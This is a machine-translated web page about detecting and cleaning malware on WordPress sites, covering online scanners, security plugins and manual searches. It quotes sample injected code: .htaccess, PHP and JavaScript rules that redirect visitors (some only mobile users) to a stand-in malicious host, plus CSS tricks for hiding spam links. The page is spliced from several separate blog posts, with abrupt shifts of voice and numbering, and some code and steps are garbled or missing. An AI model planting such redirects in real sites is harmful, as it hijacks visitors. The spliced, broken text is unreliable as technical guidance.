How to set up smartphones and PCs. Informational portal
  • home
  • In contact with
  • Finding and removing malicious code on WordPress. How to find malicious code and hidden links in a template

Finding and removing malicious code on WordPress. How to find malicious code and hidden links in a template

05.07.2019 In contact with

Before you figure out how to clean up a WordPress site, you need to understand what, in fact, we will be dealing with. In a broad sense, the term “virus” refers to malicious software that can cause some kind of damage to the owner of a web resource. Thus, almost any code embedded by attackers into engine scripts can be included in this category. These can be hidden links that lead to pessimization in search results, backdoors that provide admin access to a hacker, or complex structures that turn the site into a zombie network node, and even a bitcoin miner. We will talk about how to identify and eliminate viruses of various calibers, as well as protect against them.

Many of the tips mentioned in previous articles can protect the site from infection. For example, "infection" can be found in pirated templates and plugins, the complete rejection of such components is an important step in terms of security. However, there are a number of more specific nuances.

1. Install a reliable antivirus

A malicious program can be introduced not only from the outside - the computer from which the project is administered can be the source of infection. Modern Trojans can not only steal the FTP password, but also download the executable code on their own, or modify CMS files, which means that the safety of your web resource directly depends on the security of your working machine.

The IT market offers many antiviruses. However, the most reasonable choice is the products of large companies:
● Among domestic products, the leading positions are occupied by the proposals of Kaspersky Lab and Dr. Web.
● Among foreign commercial solutions, one can single out the Norton line from Symantek Corporation and the popular ESET NOD;
● If we talk about free options, then Avast and Comodo are unconditionally in the lead.

2. Scan the site using online services

If suspicious activity is detected (engine errors, slowdowns, pop-up windows and third-party banners), the simplest thing you can think of is to run the resource through an online scanner that can determine the fact of infection. The undisputed leader here is VirusTotal, located at virustotal.com. To use it, just go to the “URL-address” tab, drive in the link of interest and click on the “Check!”

After a while, the system will issue a report with the following content:

It should be clarified: VirusTotal is not an independent project, but a kind of aggregator of anti-virus scanners. In this regard, it becomes possible to check WordPress for viruses simultaneously in 67 systems. The undoubted advantage is a detailed report, which provides data on all supported services. After all, antiviruses are very fond of sounding a false alarm, so even if the detection rate differs from the ideal one (for example, 3/64), this does not mean that the resource is infected. Focus, first of all, on large players (Kaspersky, McAfee, Symantec NOD32 and others), small offices often define certain sections of the code as dangerous - do not take this seriously!

3. Use Yandex.Webmaster

You have probably noticed that some links in the search results are provided with a warning message: “The site may threaten your computer or mobile device.” The fact is that the search engine has its own algorithms for detecting malicious code, notifying users of the potential risk. To be aware of what is happening and be the first to receive notifications, it is enough to register in the Webmaster service. You can view all the necessary information on the “Security” tab:

If a threat is detected, information about infected pages will be displayed here. Unfortunately, a selective check of WordPress for viruses is not possible - Yandex performs scanning on its own, moreover, not all uploaded web documents fall into the sample, but only a part of them, determined randomly.

4. Check Google Reports

The most popular search engine in the world offers an even easier way to monitor - just follow the link google.com/transparencyreport/safebrowsing/diagnostic/?hl=ru and enter the address of the site of interest in the appropriate field. You will receive comprehensive data on the resource, and see if Google has any claims in terms of detecting malicious scripts:

How to clean a Vodpress site from viral links?

Let's move on from general recommendations to specific ones. Let's start with common variants of malicious code - the introduction of extraneous URLs and redirects to the target web resource. Unfortunately, black hat SEO is still popular, which means that hackers are not sitting idle, since this task is one of the easiest. Let's sort it out in order.

1. Redirect to third-party resources

Imagine the situation: you go to your own website, but you are immediately transferred to another “leisure” catalog or a landing page offering to make money on Forex. This almost certainly means that the web resource has been hacked, and a few new lines have appeared in .htaccess. Treatment is elementary: open the file, find the directives containing the address to which the redirect is going, and then delete them. So, for the conditional malwaresite.com, the necessary constructions can be as follows:

< IfModule mod_alias. c>Redirect 301 https: //site/ http://malwaresite.com/

< IfModule mod_rewrite. c>RewriteEngine On RewriteBase / RewriteCond % ( HTTP_HOST) ! ^texeo\. su [NC] RewriteRule ^(.* ) http: //malwaresite.com/$1

RewriteEngine On RewriteBase / RewriteCond %(HTTP_HOST) !^tekseo\.su RewriteRule ^(.*) http://malwaresite.com/$1

A more sophisticated option is a permanent redirect written in PHP. If you checked and didn't find anything suspicious, the problem is most likely in the index.php file. Redirection here is done by sending the necessary headers to the visitor:

include("redirect.php"); exit();

Remember - there are no such fragments in the original index.php, so you can safely delete them all. Also find and eliminate the include file (in our example it will be redirect.php located in the root folder).

A more tricky move is a redirect for mobile gadgets. Accessing your resource from a personal computer, you will never reveal the fact of infection, however, users of smartphones and tablets will be unpleasantly surprised when they get to another page. Such a redirect can be implemented:

1. .htaccess
The simplest way, which is easily calculated. The device is determined by the presented User Agent. It might look like this:

< IfModule mod_rewrite. c>RewriteEngine on RewriteBase / RewriteCond % ( HTTP_USER_AGENT) ^.* (ipod| iphone| android) .* [ NC] RewriteRule ^(.* ) $ http://malwaresite.com/

RewriteEngine on RewriteBase / RewriteCond %(HTTP_USER_AGENT) ^.*(ipod|iphone|android).* RewriteRule ^(.*)$ http://malwaresite.com/

2.PHP
Similarly, a redirect is implemented in PHP. The construct below can be found in the index file. Again, do not forget about the ubiquitous include:

"/(android|bb\d+|meego).+mobile|ip(hone|od)|blackberry|zte\-/i", substr ($uagent , 0 , 4 ) ) ) header ( "location: http://malwaresite.com/") ; ?>

3.JavaScript
Here comes the screen resolution check, if the width is 480 pixels or less, the visitor is redirected to a malicious site. If your project uses a similar method, be sure to check this block for address changes.

< script type= "text/javascript" >if (screen.width<= 480 ) { window. location = "http://malwaresite.com" ; }

2. Check outgoing links

However, the redirect is too rough and explicit way. Much more common is the injection of URLs hidden by CSS and other methods. What you can't see is almost useless to fight. However, by using the awesome Xenu Link Sleuth utility, you can evaluate your WordPress link profile. The latest version of the program was released in 2010, however, it is still relevant to this day, and even works great under Windows 10.

With Xenu installed and running, click File - Check URL. You will see a window:


Here it is enough to enter the project domain, and click OK. It is also possible to add filters by mask:
● Consider URLs beginning with this as 'internal' - consider addresses containing the specified fragment as internal;
● Do not check any URLs beginning with this - allows you to exclude certain links from checking (for example, if you want to see only outgoing links, enter the site domain here).

Upon completion of the procedure, the utility will offer to check WordPress for the so-called orphan files - web documents that do not have a single URL.

If you answer in the affirmative, a data entry window for FTP authorization will appear:


This function can be useful if the site is old and has undergone a lot of changes during its existence: it can be used to clear the directories of “garbage”. However, we are more interested in the scan results:

Thus, if there are viruses on WordPress that cause hidden URLs to appear, Xenu will help to detect the fact of their presence. The only question is how to proceed.

3. Search and destroy

Let's imagine that Xenu found active links to a hypothetical malwaresite.com. How to find and remove them? Sometimes the task is extremely simple. Non-professionals act rudely, limiting themselves only to hiding the URL from prying eyes, but the address itself can be written explicitly in the code. The following options are possible:
1. Placement of the url in the footer instead of copyright;
2. Using the orphan files described above (for example, an html document is loaded into a directory with images - search engines can also index it);
3. Manipulating Cascading Style Sheets:
● text-indent: -9999999999px/position: absolute; left: -9999999999px - move the link outside the display;
● display:none/visibility:hidden - make the text invisible;
● font-size: 1px; - single-pixel URLs that cannot be seen.

To find and remove a virus from a WordPress site, it is enough to scan the entire engine for the presence of a line containing “malware.com”. On Windows, this can be done using the free file manager Unreal Commander:

1. Upload all project files to a local folder on your computer using FileZilla, as described in the previous article;
2. Launch Unreal Commander and click the spyglass icon to enter the search interface;

3. Select the desired folder, check the "With text" field, enter "malwaresite.com", specify all encodings and click "Start Search".

The result will be a list of files in which the phrase was found. Now it remains to edit them by removing the lines of code responsible for displaying the link.

Using PHP Antivirus for WordPress

The cases described above are just the tip of the iceberg. A professional hacker can find a non-standard approach even to such a simple task as placing a hidden backlink. As a rule, you will not be able to find anything on your own, without the help of the appropriate software. Fortunately, such solutions exist, many of them, moreover, are free. Let's take a look at the most effective ones.

1. AI-Bolit

Probably the most popular antivirus product from Revisium. Available in two versions: to work directly on the hosting, and a local machine running Windows (compatible with 10, does not require installation). Unfortunately, the *nix version does not have a web interface and is only suitable for a VDS or Dedicated server, so we will analyze how to work with the tool on a PC.

1. Download the utility from the link revisium.com/kb/scan_site_windows.html and unzip it to any convenient place on your computer. Please note: the path to the directory should not contain Russian letters, so the easiest way is to place it in the root of the disk;
2. Inside the archive, you will see the following: a folder with the “aibolit” antivirus itself, “site” (here you need to copy the checked web documents, all of them will be scanned, regardless of the nesting level), as well as three bat files:
● start — for a quick check;
● start_paranoic - deep scan to identify any suspicious code fragments;
● scan_and_quarantine — the script will place all dangerous files in an archive.
3. To get started, double-click on any of the presented bat-files, depending on what result you want to get. The scan will start and generate the report AI-BOLIT-REPORT.html (can be viewed in any browser). In quarantine mode, it will be in an archive with suspicious scripts

Of course, there is actually no malware at all. And, as you can see in the screenshot, the developers themselves warn about the likelihood of errors.

2.Manul

In addition to monitoring, Yandex offers everyone to use a free antivirus of their own design. Written in PHP, Manul can be run on almost any web server and is compatible with most popular CMS. In addition, the script can not only detect, but also remove dangerous code. Below is a step-by-step guide to identifying and treating viruses.

1. Download the program at https://download.cdn.yandex.net/manul/manul.zip;
2. Unzip the archive to the root directory of your site;
3. Follow the link site_name/manul/index..php);
4. Create a password. The script has serious security requirements: the passphrase must be at least 8 characters long, contain capital letters, numbers and special characters.
5. Now you can start scanning by clicking on the button of the same name. You can also customize the script by setting the request interval. The larger this value (in seconds), the longer it will take to check. The coefficient can be set to zero, however, on low-power hosting, this can lead to a significant increase in response time, up to the unavailability of the resource.
6. After that, the check will start - do not close the tab before it ends!
7. When the scan is completed, a window will appear with a button to download the report. Click on it to download scan_log.xml.zip.

8. In another browser tab, open the analyzer located at https://antimalware.github.io/manul/. Click on the “Upload file” button and send the resulting archive for verification.

9. At this stage, we proceed directly to the removal of viruses from the WordPress site. A window will open in front of you, in which you can select operations on dangerous files (depending on the degree of threat, they are marked with a red, yellow, or green flag). The “Quarantine” button allows you to archive suspicious files, and the “Delete” button allows you to get rid of them forever.

10. Having completed the desired actions, scroll down the page and copy the code that appears in the “Prescription” field

11. Now return to the Manul tab, go to the “Treatment” section, paste the received code into the field that appears and click “Execute”.

https:="" lazy="" lazy-hidden="">

13. Upon completion of all procedures, a log window will appear on the screen. You can also download quarantined files, if available

3. Santi

A relatively young project designed to detect and eliminate viruses on a WordPress site. Currently, the product is in beta testing and is free, the only paid service is SMS notification of the owner about detected threats. In addition to the monitoring module itself, the script offers consumers many tools to eliminate the consequences of intruders' activities. But about them - later, first we will deal with the installation.

1. Download the distribution kit from the official site santivi.com. Unpack the contents of the archive into a folder previously created on the hosting in the root directory, for example: /var/www/website/public_html/santi_av

The above is a simple name, but it's best to use a random sequence of lowercase English letters and numbers.

2. Go to the antivirus page. In our example, the address will look like this: https://site/public_html/santi_av

4. At the first start, you need to configure the script by checking the automatically set parameters and making adjustments, if any. Also be sure to change the data for authorization:

5. Register on the product website, then fill in the "Personal information" section by entering the received SANTI ID, E-mail address and mobile phone (optional - needed for SMS distribution). Subsequently, you can turn on preferred notification methods on the “Informing” tab.

6. On the “Files and DB” tab, specify information for connecting to MySQL, and also select a method for backing up web resource files. The following options are supported:

● creating a local copy;
● Using an FTP server;
● Yagdex.Disk;
● Google.Drive;
● Dropbox.

7. After completing the above manipulations, click on the “Finish” button. If everything went well, the following will appear on the screen:

You can change the settings in the program section of the same name.

“Santi” has an intuitive interface and contains everything you need to effectively remove viruses from your WordPress site. The tools are divided into thematic sections. Let's consider each of them:

1. Home.

Here you will find the most necessary information about the protection status. From the notifications section, you can issue commands on actions to be taken with detected threats.

2. Autopilot

Allows you to configure the actions performed by the script in automatic mode. Among them:
● File Monitor - scans the integrity of web documents, except for dynamic ones (access logs, errors, etc.). Checks modification date, hash sum, appearance of new directories and files.
● Database monitoring - captures suspicious activity in MySQL.
● Backup - completely backs up the site at certain intervals, keeping a copy on the server or in the cloud storage. You can configure the settings through the appropriate tool in the “Utilities” section (there is a possibility to selectively select directories and files). At the output, you will receive an archive in a specific .sabu format - only Santi himself, as well as a proprietary program for a Windows-based PC, can process it.
● Checking the site through the eyes of search engines - uses information from Yandex and Google about threats detected on the resource.
● Scanning the site through the eyes of desktop antiviruses - scanning based on signatures provided by the largest companies that develop solutions in the field of cybersecurity for PCs.

3. Utilities.

Here is a set of auxiliary tools designed to help maintain the site and ensure its security. Consider the most interesting:
● Date-search. It is useful if the period of infection is approximately known. With the help of filters, you can set the time range, as well as list file extensions and specify how to process them (exclude from search or check).
● Configurator.ftpaccess. Used to configure FTP servers based on ProFTPD and Pure-FTP.
● Removal of malicious inserts. It will be useful if the WordPress site has suffered from a virus, and you know exactly its code. You can specify the beginning and end of a dangerous fragment, list the types of files that need to be processed/excluded, separated by commas, and select the action “search” or “search and disinfect”. In the latter case, the given sequence will be automatically deleted when it is found.
● File editor. Supports work in several encodings, line numbering, elementary syntax highlighting.

Specialized antiviruses for WordPress

In addition to those listed, there are more narrowly focused solutions made in the form of plugins for CMS. Let's analyze the most effective.

1.AntiVirus

How to check WordPress templates for viruses? The answer lies in a small module with an extremely uncomplicated name and a very ascetic interface. The settings window prompts us to run a manual scan (Manual malware scan), or enable automatic monitoring of the project (Check the theme templates for malware). The second checkbox allows you to connect Google Safe Browsing databases. It is also possible to enter an email address - in this case, reports will be sent to your E-mail.

If you click the “Scan the theme templates now” button, all templates installed in the system will be immediately scanned. The page will appear:

The utility highlights suspicious fragments with a red frame. Of course, false positives are also possible - in this case, AntiVirus has allocated a block of code responsible for preventing the display of messages about erroneous authorization. In such cases, just click on the “There is no virus” button.

2.TAC

Another highly focused module is Theme Authenticity Checker. After installation, it will appear in the “Appearance” section of the admin panel. There is no need to configure and run anything here at all - the plugin conducts a fully automatic scan and issues a conclusion without any details:

3. Quttera

A more advanced module that scans the entire engine. Two types of verification are available: external — using an online service:

and internal - using the script of the plugin itself. To launch them, just click on the “Scan Now” button.

The result of the check will be the following report:

As you can see, the antivirus separates all found files into potentially dangerous, suspicious and malicious ones. Such a classification is largely conditional - like its counterparts, Quttera tends to raise false alarms. It is best to put the plugin on a site that is obviously clean and run primary monitoring, which results in adding all “rejected” files to the white list. To do this, just go to the “Detected Threats” tab and click “WhiteList File” under each warning.

4. Sucuri Security

This plugin is the most advanced of the specialized ones. The disadvantages include mandatory registration on the official developer resource and obtaining an API key, otherwise the functionality will be limited. A corresponding warning will appear immediately after activation.

By clicking on the button, you will see the following window:

The administrator's domain name and email are determined automatically, but the latter can be changed. The DNS Lookups checkbox should only be checked if you are using CloudProxy.

Before you figure out how to protect WordPress from viruses, you need to properly configure the extension in the Settings section. Here you will see several tabs at once. In General, you can set the main parameters:
● Plugin API Key - allows you to enter an API key;
● Data Storage Path - specifies the path to the directory where Sucuri Security stores logs, a list of checked files and other service information (by default - /uploads/sucuri;
● Reverse Proxy and IP Address and IP Address Discoverer - activate if external proxy services or firewall are connected;
● Failed Login Password Collector - includes tracking of failed login attempts on the site;
● User Comment Monitor - Check the content of comments added by users. Helps protect against both spam and malicious inserts;
● XML HTTP Request Monitor - filters Ajax requests, may adversely affect site response time;
● Audit Log Statistics — display of event statistics, here you can set the number of analyzed records (by default — 500);
● Date & Time - allows you to change the time and date if they are defined incorrectly;
● Reset Options - reset the default settings (useful if you start experiencing problems with site performance or scripts after installing the plugin, but you can't figure out what's wrong).

The “Scanner” tab allows you to:
● Start a forced scan with the “Fast Scan” button;
● Choose one of three algorithms (SPL - the fastest, Global - the slowest and most thorough, or OpenDir - the golden mean);
● Set the scan frequency (by default — 2 times a day);
● Enable and manage the file system scanner (FS Scanner);
● Set up report analyzer and clear logs.

On the “Alerts” tab, you can specify an email address for sending notifications, as well as set a message template by choosing from those offered, or by entering your own in the “Custom” field.

Here you can also set the frequency of sending emails and parameters for detecting brute force attacks.

Below you can fine-tune alerts. In addition to the default checkboxes, it is worth activating all checkboxes related to user actions - this will help to successfully catch spammers and brutefores.

It is also worth including all the items related to the status of plugins (marked with a plug) and templates (marked with a brush). This will not load the system, but it will help to detect the actions of an attacker who has gained access to the project and made changes to its configuration.

The “Ignore Scanning” section allows you to specify directories that do not need to be scanned (you must specify the absolute path to the folder). It is worth adding the locations of video and audio files here: checking them is pointless, and it will eat up a lot of server resources, which will negatively affect performance.

“Ignore Alerts” allows you to exclude changes to certain types of content (post-types) from alerts.

The “Trust IP” tab allows you to set ranges of IP addresses, actions from which will not be registered by the system. It is convenient if the work with the project is carried out by a group of people from the same subnet.

“Hearbeat” helps to configure the API of the same name used for server-browser two-way communication. It is mainly used in workgroups, and if you are the sole owner of the site, it is better to turn it off altogether. This will remove an additional vulnerability, as well as increase the performance of the engine.

After making all the edits, you can start scanning in the Malware Scan section with the corresponding button:

In addition to the scanner itself, Sucury Securyti includes a number of useful tools that allow you to protect WordPress from viruses even before the site is hacked. All of them are collected in the Hardening section. I will list the possibilities:
● Verify WordPress version - monitors the relevance of the core engine and allows you to run a forced update;
● Website Firewall protection - CloudProxy connection (WAF must be preconfigured on the corresponding tab);
● Remove WordPress version - removes the CMS version display;
● Block PHP files - blocks access to service files via .htaccess (for Apache), or offers recommendations for configuring Nginx;
● Verify PHP version - checks if the version of the installed interpreter is up to date;
● Security key - will let you know if you forgot to update the security keys in wp-config.php;
● Information leakage (readme.html) - removes the Readme file containing information potentially useful to a hacker;
● Default admin account - checks if the admin login is used for the super administrator account;
● Plugin & Theme editor - blocks the built-in template editor in one click;
● Database table prefix - reminds you to replace the MySQL table prefix with a unique one, instead of the default wp_.

The Post-Hack section will come in handy after you have cleaned your WordPress site of viruses. There are three tools here:
● Security keys - allows you to create a new set of security keys and replace compromised ones;
● Reset User's Password - will help you bulk reset the passwords of registered users of your choice;
● Reset Plugins - Reverts all installed plugins to known safe versions, with the exception of premium add-ons.

Let's summarize

After reading the article, you are convinced that the fight against malware is not at all something out of the ordinary. Thanks to the availability of specialized solutions, even a non-professional can perform such operations as checking a WordPress template for viruses, monitoring the CMS core and cleaning the site in case of infection. But just like in medicine, in IT, the key to success is not cure, but prevention. Remember - hackers pose a threat not only to you and your offspring, but also to visitors to the web resource. Often, it is they who are under attack by visiting infected pages. This is fraught with the loss of the most important thing - the trust of users, which will inevitably result in the loss of regular readers, and even customers. Therefore, it is very important to take care of security issues as early as possible, minimizing the likelihood of hacking.


Hello Idea Fox friends!

I don't know about you, but I don't sleep well at night. Blog security issues torment me. No more power :-)

I read a bunch of blogs on this topic and tested many plugins that help solve this problem. Yes, and in the comments they began to ask questions on the topic of protecting the site, which prompted me to write this note.

Just imagine that you are blogging, writing articles, trying ... And evil assholes come and break your site. I think that there will be a lot of disappointments.

After all, every normal blogger invests a lot of time and effort in the development of his site. And for many, blogging generally becomes an obsession ... Here and up, if SUCH happens :-)

Well, you understand how important this is.

Let's finally get down to business :)

A couple of months ago I already wrote a note about something from hacking. Be sure to read it. But quite a lot of time has passed since then, and I have taken additional measures to strengthen all-round defense.

In the following notes, I will definitely dwell on this issue in detail. (I also remember and write about setting up ISP)

3. We check the site on other online services

Such services divorced apparently-invisibly. I have a strong opinion that many of them are completely stupid and created solely to display ads.

Doctor Web

DR.Web has made a good service for checking websites online. Personally, he helped me once to find an infection from a friend on the blog (There was a third-party code in the .htaccess file)

The check is very simple. Enter your URL and wait for the result of the check.

antivirus-alarm.ru

A powerful site scanner that uses as many as 43 anti-virus databases from the world's leading anti-virus companies.

Here, too, everything is very simple. We drive in the URL of our site and with bated breath we are waiting for the scan results.

This is what I've been waiting for.

Everything is clean, you can sleep peacefully :-)

All this is certainly good, but you also need to install a couple of plugins that do not interfere at all with WordPress blogs.

4. Ask the host to check your site

The fact is that hosters are even more concerned about security issues than you are and have powerful protection tools. And specialized means of protection.

Here is my news for you today. Next, I will talk about a very powerful plugin that allows you to significantly protect your WordPress blog from hacking.

I have been working with him for 2 months and I am very pleased with him. So far, I've dealt with him 3 times and banned myself: -) In short, there is something to tell.

Periodic checking of the site for malicious viruses is necessary; this is the first commandment of any self-respecting webmaster. Even if you use a clean Twenty Eleven theme, it is not a fact that over time it has not become infected either. This phenomenon can (and most often does) occur due to the fact that the WordPress engine itself was originally designed for online publishing. So it never hurts to check again and make a copy of the site and database.

For example, I (after some time, of course) made one conclusion for myself - you just need a good hoster, and your reservation problems will disappear by themselves. I don’t need to make backups of the database or the site now - the hoster does everything for me, and automatically. At any time, if you wish, you can order a copy of any section of your blog (and not only), download this copy, or restore the blog directly from the control panel. That is, I do not need to download a backup, everything happens automatically - backup, restore, etc. This is convenient because I can track, not just by the day, but by the hour, when a virus appeared on my blog and, accordingly, take measures to eliminate it.

I'll start with the good news - at least two of the plugins I've used perform well in detecting and locating malicious code. These are the AntiVirus and Exploit Scanner plugins. You won't believe how much bad code is on your blog! But do not take all the resulting information after checking as a dogma - many lines that these plugins detect actually do not carry anything bad in themselves. It's just that the plugin questions some lines, that's all. To verify this, manually check the fragments that the plugin has identified as malicious. So, when checking the plugin AntiVirus It turned out that even a simple call to function get_cache_file () is already considered suspicious by the plugin. So all the results of the checks will have to be tracked manually. But this, for example, is a really infected link, and it needs to be removed:

How do you know if it's a virus or if it's supposed to be? Everything is very simple - compare your clean template (if any), and compare it (file-by-file) with the one that is installed and has already undergone some changes. It is not necessary to make a comparison directly and literally, just use a search to check if your clean template contains the line that the plugin highlighted. If there is, click the "This is not a virus" button, and this line will not be taken into account during the next check.

And here is an example of the second plugin I tried - Exploit Scanner

As you can see, everything is much more neglected here. For me, this result was shocking. But that's not all. The plugin has such a function as checking . So, if you turn it on, it turns out that the blog should consist of text and a maximum of a couple of CSS tables. So, it seems to me that the author of the plugin obviously overdid it with security here. It's good that the plugin just shows the alleged infected fragments, and does not clean them.

After analyzing all the lines highlighted in yellow, you can easily detect malware (malicious code), well, what to do with it next is up to you. The cleaning method is still the same - compare the selected code with the site backup (see) and, if you find discrepancies, find out whether you did it yourself, or someone did it for you, which means that this is no longer good and may turn out to be virus. Even WordPress developers advise checking the site for malicious code with this particular plugin. But there are such harmless inserts, for example, in the body of an iframe, which the plugin can also detect as infected code. But in fact, without these lines, this section of your blog will not work correctly.

How can malware get into blog files at all, and what is it by definition? The word malware literally means - malicious software, from English malicious software. This is any software that can be used for unauthorized access to the site and its content. You probably imagine that for a trained average hacker, it will not be difficult to hack a site, especially after registration. After that, you can modify the content of the blog as you like - it would be education.

Malicious malware can also be inserted into plugins that you install from an unknown source, and into scripts that you also sometimes take without checking, but trusting the author. The most harmless malware is a link to the author of some module that you have installed on the site. And if the author himself did not warn you that such a link exists, then this is already pure virus.

So, I installed a new theme on a test blog, and after deleting one harmless link to some kind of men's club in the site's footer, it stopped opening at all, and an inscription appeared on the main one - "You have no right to remove links." Here's a free theme for you. You can read about how to tear out such left links.

Your database can also be used to run malicious code. Spammy links are also very often added to posts or comments. Such links are usually hidden using CSS so that an inexperienced administrator does not see them, but the search engine distinguishes them immediately. Of course, any antispam comes into play here, for example, the one that is licensed, checked and rechecked many times. The hacker can download files with image file extensions and add them to the code of your activated plugins. Therefore, even if the file does not have a php extension, the code in that file can be run.

There is another simple tool with which I started my acquaintance with malware - the Theme Authenticity Checker (TAC) plugin. It's lightweight and powerful enough, but it only checks your topics, even the ones that aren't active. It does not touch the rest of the directories, and this is its minus. Here's what I got from checking my current theme with this plugin:

Two warnings in the active topic, and nothing else. There is no malicious code. By the way, these are the links that I inserted myself on the advice of Google - to improve the quality of the snippet (display personal data, address of the organization, etc.). But this is only checking the theme files, and what is done in other directories, you will have to find out either with the help of other plugins or online services. For example, such a service (it deserves trust) as Yandex Webmaster or similar in Google. They have the function of checking any web resource for malicious inclusions, and they do it efficiently. But if this is not enough for you, then compare the results with the results on other services and draw conclusions.

For some reason, I want to believe Yandex, not plugins. Another good resource is http://2ip.ru/site-virus-scanner/. After checking one of my blogs, here's what I found:

Here you can also check individual files for malicious code if you have such doubts. In general, the service is good.

From all of the above, I would draw the following conclusions:

1. In order to prevent the appearance of malicious code, you must first of all use trusted services for downloading files - plugins, themes, etc.

2. Regularly make backup copies of everything that the site contains - databases, content, admin panel, including uploaded third-party files.

3. Enjoy updates offered by WordPress. They are at least virus-free, although not always functionally justified. But by updating, you thereby remove viruses that may be present.

4. Unused themes, plugins, images and files, delete without regret - this is another fallback for malware, which you may never guess.

5. Be sure to password-protect your FTP access, PhpAdmin login, admin panel, and in general, where no one but you should have access.

6. Try (even if this desire is as big as the sky) do not change or replace WordPress core files - developers know better what should work and how.

7. After detecting and removing viruses, change all passwords. I think you will have a great desire to make a password of 148 characters in different registers and with special characters. But do not get carried away with too complicated passwords, you can lose it, and then you have to restore everything, which is not very pleasant.

All these methods and components that I have described that will help you get rid of viruses, of course, are free, of course, almost home-made, and of course, do not give a 100% guarantee that your site will be cleaned of malicious inserts. Therefore, if you are already concerned about cleaning the blog, then it is better to contact professionals, for example, in the service Sucuri(http://sucuri.net/). Here your site will be carefully monitored, practical recommendations will be given, which will be sent to you by letter, and if you do not want to clean the site yourself, then specialists are at your service who will do everything in the best possible way within 4 hours:

The WordPress platform is gaining more and more popularity among bloggers due to the convenient and fast process of creating and managing a Web site. Separately, it should be noted a huge number of free plugins and widgets available for this system. Based on this platform, you can build not only a regular blog, but also an entire online store, news portal or online cinema.

But most of the websites built on this free CMS have certain security vulnerabilities. WordPress developers, of course, are trying to quickly close them and release updates not only for the platform itself, but also for standard themes and plugins. However, it is not always possible to protect yourself from hacking.

Based on the latest research presented on the official website of the platform, one can get a clear idea of ​​the infection mechanisms, since a site built on WordPress can be hacked mainly through third-party plugins or modified themes.

In the event of a hack, most inexperienced Web administrators tend to panic and make irreparable mistakes that can lead to the loss of the entire database or files. In this article, we will try to tell you how to "cure" a Web site and return it to the state in which it was before the hack.

Backup

There are two ways to back up a Web site: copying the source files of the site and copying the database (DB). There is a standard backup tool for WordPress, but it only creates a copy of the database.

To back up files, you can use third-party plugins or use full automatic backup, the tools for which are usually present on the hosting. It is not very difficult to set up a full backup on a specific schedule, but later this process can save administrator nerves and save a significant amount of time. If you cannot set up a full data backup mechanism yourself, then it is strongly recommended that you contact your hosting provider to resolve this important issue. Novice Web administrators may be advised to perform regular manual backups.

If a copy of the site and the database is stored on a flash drive, then this is a 100% guarantee that you can easily restore the Web site at any time.

Recovery or treatment

Almost all Web sites are designed to generate income for their owner. Therefore, it is a requirement for a Web site to operate 24x7 (24 hours a day, 7 days a week) with minimal downtime for maintenance.

Therefore, in the event of a Web site infection, administrators strive to restore information from backups as quickly as possible. But since the problem persists, and the Web site still has a "hole" in the security system, re-hacking will happen very soon and will not take the attacker much time.

This situation will repeat itself over and over again, especially for popular Web sites, so the correct solution to the problem is to urgently close the vulnerability. If you limit yourself to only permanent restoration of the Web site, then you can lose all indicators in search engines and even fall under their filter due to the spread of malware.

How to detect malware

How do you know if a Web site has been hacked and identify the first symptoms of an infection? In fact, it is very simple, the failure of traffic statistics, redirects to unfamiliar Web sites, excessive traffic consumption are all signs of infection and the presence of malicious links that lower the resource rating. Not to mention obvious situations when a mark about the "infection" of your Web site appears in the search results of Yandex or Google.

When visiting an infected site in Opera, Chrome or Firefox web browsers, a warning window about an infected resource will be displayed, since these browsers have their own databases for detecting infected sites. After all, the local antivirus can determine that the Web site has been infected when you see a message when you try to navigate between internal pages. It may turn out that the website has been hacked and is being used to send promotional spam. You can find out about this when your hosting address starts receiving notifications of bulk spam.

How should one act in such situations? First you need to determine where the virus or advertising link is hiding, and how they got to the site, as themes, database or site core can be "infected".

The easiest, but also the longest way to search for a virus is to try to track the modification dates of files. Suppose the bulk of the files in the most important directories ( wp-includes, wp-admin etc.) have the same creation date, but there are one or two files with later creation dates. Check these files and compare them with the files from the WordPress distribution. You can also compare files by size in Total Commander. It remains only to compare the contents of suspicious files and find out what the extra code fragments found are intended for.

How to check the processed HTML code

Perhaps, for some reason, you were unable to detect the problem with the method described above. Then you can try to find the source of infection in another way.

You will need to open the "infected" website in a browser (preferably Opera or Firefox) and select " Show site source code". If you know HTML, you will probably be able to notice suspicious strings. These may be unfamiliar links to sites, pieces of "compressed" or encrypted (in the base64 way) code, or it may be an unknown piece of Javascript, which will probably also be encrypted. Determine it it is possible by the command included in the fragment code eval. This usually means that someone was trying to hide the true Javascript code, which should raise some suspicion. Figure 1 shows an example of suspicious code.

Rice. 1 Fragment of suspicious HTML code

By the way, if a free third-party template is used on a Web site, then this method can be used to find sponsored links embedded by template authors. Usually such links are harmless, ie. are not considered viruses. However, they can negatively affect the performance of the Web site in search engines and redirect traffic to a third-party resource.

When the malicious code on the pages of the site cannot be detected using the methods described above, third-party online tools can be used. For example, you can install the WordPress Exploit Scanner plugin, which will regularly check your website for malware. The plugin provides a detailed report and highlights rows that should be deleted later.

In addition, you can scan the Web site with the online scanner Sucuri SiteCheck - this service is absolutely free, and for a fee you can order a complete treatment of the resource.

How to Check Plugins and Themes for Malicious Code

As for themes, you can track malicious code in them manually or install the TAC plugin, which works with theme files, checking them for extraneous links and virus code. With this plugin, you can check both already installed themes and new ones.

Determining the presence of a virus in a theme or plugin code is very simple. If the active theme is based on one of the official themes, then you just need to compare the original code with the code of the theme being checked. To do this, download the default theme that comes with the WordPress distribution, change its name and switch the theme to it. It remains only to check the HTML code generated by the server for the presence of a virus, and if it is found, then the problem is clearly not here.

If malicious code was found in the files of the active theme, and additional themes were installed, but not activated, then you will have to check each of them, as it is possible that the virus infects certain files from the directory themes. It is best to use only one theme, and delete all inactive ones.

Searching for viruses in the plugin code is also not particularly difficult. You should consistently disable plugins and check the generated HTML code. Thus, it is possible to identify an infected plug-in, remove it and reinstall it from the repository again.

The best ways to protect WordPress plugins and themes:

  • download and install themes and plugins only from trusted websites;
  • do not use "hacked" paid plugins and themes;
  • remove unused plugins and themes;

How to Find Malicious Code in WordPress Core Files

If you've checked plugins and themes, but still haven't been able to identify the source of the infection, it's possible that it's located directly in the WordPress core files. A kernel infection may mean that an attacker gained access to the administrative part of the site by guessing or intercepting the password for accessing the Web site via the FTP protocol.

First of all, check for viruses the computer from which you accessed the FTP or the Web site's administrative interface. The password could have been stolen from your computer using a Trojan virus that gave sensitive data to an attacker.

Attackers often embed .htaccess redirect codes, encrypted links to malicious scripts located on remote servers, so the first step is to compare this file with the original one from the distribution. Pay special attention to lines like this:

RewriteCond %(HTTP_REFERER) .*yandex.* RewriteRule ^(.*)$ http://unknownsite.com/

